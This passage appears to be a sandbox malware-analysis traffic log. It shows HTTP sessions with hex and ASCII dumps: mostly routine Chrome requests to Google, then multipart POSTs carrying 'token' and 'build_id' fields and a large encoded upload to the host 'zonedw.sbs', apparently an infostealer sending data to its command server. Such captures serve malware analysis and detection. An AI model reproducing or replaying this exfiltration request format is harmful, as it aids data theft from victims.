73 52 6c 52 72 55 33 56 52 62 55 4e 44 4f 68 4e 54 59 57 34 67 52 6e 4a 68 62 6d 4e 70 63 32 4e 76 49 Data Ascii: 2a61VUNDN1J6ZzMrQ2FmdXVxcjZLbjRHcGx5N2lIaHNuR3FnUG94ZzM4aFp2dlhkRDE0RkZjejR4NTgwVm5ld0t4N2NUekpXT21PMzZHQ1dLOE1pL3pVVFl3aitmWjJIV1pTY0ZjZUR0NHBqZU1qNzZtV0tIZjdtWVY2TFo1K0lIWGs3M1E2MldyQ3NQNTNXUC9CenVzWE45WnFXTFdBQUFBQUVsRlRrU3VRbUNDOhNTYW4gRnJhbmNpc2NvI
2024-12-13 17:58:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.7	50248	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:18 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.7	50249	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:18 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-13 17:58:19 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 13 Dec 2024 17:58:19 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:58:19 UTC	372	IN	Data Raw: 32 61 62 65 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2abe)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 39 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700339,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i
2024-12-13 17:58:19 UTC	1390	IN	Data Raw: 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 Data Ascii: ow Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(
2024-12-13 17:58:19 UTC	848	IN	Data Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c Data Ascii: uerySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.pe\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"cl
2024-12-13 17:58:19 UTC	385	IN	Data Raw: 31 37 61 0d 0a 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 3a 5f 2e 70 65 28 64 2c 63 29 29 3b 62 2e 6c 65 6e 67 74 68 5c 75 30 30 33 65 32 5c 75 30 30 32 36 5c 75 30 30 32 36 73 65 28 61 2c 64 2c 62 29 3b 72 65 74 75 72 6e 20 64 7d 3b 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 65 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 79 70 65 6f 66 20 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 Data Ascii: 17atypeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.join(\" \"):_.pe(d,c));b.length\u003e2\u0026\u0026se(a,d,b);return d};se\u003dfunction(a,b,c){function d(e){e\u0026\u0026b.appendChild(typeof e\u003d\u003d\u0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.7	50250	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:18 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-13 17:58:19 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 13 Dec 2024 17:58:19 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-13 17:58:19 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-13 17:58:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.7	50260	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:24 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----T0RIWTJM7GV3E3OPZU3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:24 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------T0RIWTJM7GV3E3OPZU3OContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------T0RIWTJM7GV3E3OPZU3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------T0RIWTJM7GV3E3OPZU3OCont
2024-12-13 17:58:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.7	50263	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:25 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VS0HVS2V3W4E3EUK6P89 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74 Data Ascii: ------VS0HVS2V3W4E3EUK6P89Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------VS0HVS2V3W4E3EUK6P89Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VS0HVS2V3W4E3EUK6P89Cont
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 